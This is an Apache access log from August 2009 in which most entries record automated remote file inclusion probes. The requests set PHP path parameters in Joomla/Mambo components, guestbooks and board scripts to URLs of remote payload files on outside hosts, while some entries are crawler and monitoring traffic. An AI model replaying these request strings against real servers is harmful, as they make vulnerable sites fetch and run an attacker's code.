67.212.186.138 - - [03/Aug/2009:02:03:30 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:02:03:30 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
75.125.35.18 - - [03/Aug/2009:02:03:58 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:04:00 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:04:01 -0400] "GET /logs/access_log.Q109051100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.199.173.101 - - [03/Aug/2009:02:04:39 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
85.199.173.101 - - [03/Aug/2009:02:04:39 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
85.199.173.101 - - [03/Aug/2009:02:04:39 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.813"
209.59.12.99 - - [03/Aug/2009:02:05:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.125.35.18 - - [03/Aug/2009:02:06:19 -0400] "GET /logs/access_log.Q109051600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:06:37 -0400] "GET /logs/access_log.Q109051600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:06:40 -0400] "GET /logs/access_log.Q109051600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:07:13 -0400] "GET /logs/access_log.Q109051600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.199.173.101 - - [03/Aug/2009:02:07:14 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
72.30.81.182 - - [03/Aug/2009:02:07:36 -0400] "GET /logs/error_log.Q109053000 HTTP/1.0" 200 2802519 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [03/Aug/2009:02:07:36 -0400] "GET /logs/error_log.Q109053000 HTTP/1.0" 200 2802519 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.125.35.18 - - [03/Aug/2009:02:07:54 -0400] "GET /logs/access_log.Q109051600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
86.58.155.104 - - [03/Aug/2009:02:08:05 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
86.58.155.104 - - [03/Aug/2009:02:08:18 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
87.230.94.131 - - [03/Aug/2009:02:08:22 -0400] "GET /logs/access_log.Q109052000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//r.jpg?? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
87.230.94.131 - - [03/Aug/2009:02:08:22 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//r.jpg?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
87.230.94.131 - - [03/Aug/2009:02:08:22 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//r.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
87.230.94.131 - - [03/Aug/2009:02:08:50 -0400] "GET /logs/access_log.Q109072100//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//r.jpg?? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
74.200.90.19 - - [03/Aug/2009:02:09:15 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
74.200.90.19 - - [03/Aug/2009:02:09:15 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
74.200.90.19 - - [03/Aug/2009:02:09:15 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
74.200.90.19 - - [03/Aug/2009:02:09:36 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
67.218.116.164 - - [03/Aug/2009:02:09:47 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.132 - - [03/Aug/2009:02:10:07 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
77.221.130.15 - - [03/Aug/2009:02:10:08 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:02:10:09 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:02:10:09 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
94.23.197.26 - - [03/Aug/2009:02:10:19 -0400] "GET //guestbook/gbook.php?a=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:02:10:19 -0400] "GET /logs/access_log.Q109062900//guestbook/gbook.php?a=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:02:10:19 -0400] "GET /logs//guestbook/gbook.php?a=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:02:10:25 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 253 "-" "libwww-perl/5.64"
80.73.192.55 - - [03/Aug/2009:02:10:26 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 232 "-" "libwww-perl/5.64"
80.73.192.55 - - [03/Aug/2009:02:10:26 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.64"
77.221.130.3 - - [03/Aug/2009:02:10:30 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.221.130.3 - - [03/Aug/2009:02:10:30 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
77.221.130.3 - - [03/Aug/2009:02:10:30 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:02:10:33 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:02:10:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.73.192.55 - - [03/Aug/2009:02:10:54 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 254 "-" "libwww-perl/5.64"
77.221.130.3 - - [03/Aug/2009:02:10:55 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
78.110.50.127 - - [03/Aug/2009:02:11:16 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 253 "-" "libwww-perl/5.814"
78.110.50.127 - - [03/Aug/2009:02:11:20 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.814"
78.110.50.127 - - [03/Aug/2009:02:11:20 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 232 "-" "libwww-perl/5.814"
78.110.50.127 - - [03/Aug/2009:02:11:53 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
64.34.176.211 - - [03/Aug/2009:02:11:54 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:12:21 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:02:12:27 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:02:12:57 -0400] "GET ///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:02:13:01 -0400] "GET /logs///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:02:13:01 -0400] "GET /logs/access_log.Q109051500///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:02:13:06 -0400] "GET /logs/access_log.Q109052100///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:13:24 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:02:13:49 -0400] "GET ///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:02:13:49 -0400] "GET /logs///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:02:13:49 -0400] "GET /logs/access_log.Q109053100///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
123.125.66.126 - - [03/Aug/2009:02:14:11 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
94.23.205.32 - - [03/Aug/2009:02:14:50 -0400] "GET /logs/access_log.Q109070900//?option=com_weblinks&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:02:14:50 -0400] "GET //?option=com_weblinks&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:02:14:50 -0400] "GET /logs//?option=com_weblinks&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12143 "-" "libwww-perl/5.803"
220.181.7.123 - - [03/Aug/2009:02:15:09 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.199.173.101 - - [03/Aug/2009:02:15:38 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
209.59.12.99 - - [03/Aug/2009:02:15:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.125.35.18 - - [03/Aug/2009:02:16:26 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:02:17:16 -0400] "GET /logs/access_log.Q109053100%20%20///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
94.23.205.32 - - [03/Aug/2009:02:17:35 -0400] "GET /logs/error_log.Q109070900//?option=com_weblinks&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
75.125.35.18 - - [03/Aug/2009:02:18:26 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:18:30 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
208.80.195.47 - - [03/Aug/2009:02:18:48 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ONDOWN3.2; Cox High Speed Internet Customer; FunWebProducts; InfoPath.1)"
87.230.94.131 - - [03/Aug/2009:02:18:49 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//r.jpg?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
75.125.35.18 - - [03/Aug/2009:02:19:02 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:19:03 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:19:53 -0400] "GET /logs/access_log.Q109051100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:26 -0400] "GET //config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:26 -0400] "GET /logs/access_log.Q109072300//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:26 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:26 -0400] "GET /logs/error_log.Q109072300//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:02:20:35 -0400] "GET /logs/access_log.Q109051600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:36 -0400] "GET //config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:36 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:36 -0400] "GET /logs/access_log.Q109072300//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:20:36 -0400] "GET /logs/error_log.Q109072300//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:02:20:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.138.88.25 - - [03/Aug/2009:02:21:02 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:21:02 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:21:02 -0400] "GET /logs/access_log.Q109061100/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.119.154.129 - - [03/Aug/2009:02:21:14 -0400] "GET /logs/access_log.Q109061500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
85.119.154.129 - - [03/Aug/2009:02:21:14 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
85.119.154.129 - - [03/Aug/2009:02:21:14 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
193.138.88.25 - - [03/Aug/2009:02:21:45 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:21:45 -0400] "GET /logs/access_log.Q109070300%20%20//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:21:45 -0400] "GET //config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:21:52 -0400] "GET /logs/access_log.Q109072300%20%20//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.119.154.129 - - [03/Aug/2009:02:22:23 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
219.117.207.76 - - [03/Aug/2009:02:23:08 -0400] "GET /logs/access_log.Q109072300%20%20//config/dbutil.bck.php?confdir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:02:23:27 -0400] "GET /logs/access_log.Q109060400%20%20///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:02:23:42 -0400] "GET /logs/access_log.Q109051800%20%20///skin/uks_gallery_v3010/setup.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.119.154.129 - - [03/Aug/2009:02:24:48 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:02:26:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.15 - - [03/Aug/2009:02:27:12 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//r0x-id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
200.6.155.240 - - [03/Aug/2009:02:27:23 -0400] "GET //components/com_mambatstaff/mambatstaff.php?phpbb_root_path=http://tycsport.twbbs.org///phpBB3/images/avatars/upload/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.6.155.240 - - [03/Aug/2009:02:27:23 -0400] "GET /logs//components/com_mambatstaff/mambatstaff.php?phpbb_root_path=http://tycsport.twbbs.org///phpBB3/images/avatars/upload/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.6.155.240 - - [03/Aug/2009:02:27:23 -0400] "GET /logs/access_log.Q109070300//components/com_mambatstaff/mambatstaff.php?phpbb_root_path=http://tycsport.twbbs.org///phpBB3/images/avatars/upload/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
200.6.155.240 - - [03/Aug/2009:02:27:25 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_mambatstaff/mambatstaff.php?phpbb_root_path=http://tycsport.twbbs.org///phpBB3/images/avatars/upload/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:02:27:56 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wattenhofer.com/charts//r0x-id.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
193.138.88.25 - - [03/Aug/2009:02:28:44 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:28:44 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:28:47 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:28:48 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:29:55 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:29:55 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:29:55 -0400] "GET /logs/access_log.Q109050800/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.138.88.25 - - [03/Aug/2009:02:29:58 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:30:05 -0400] "GET /logs//bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:02:30:05 -0400] "GET //bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
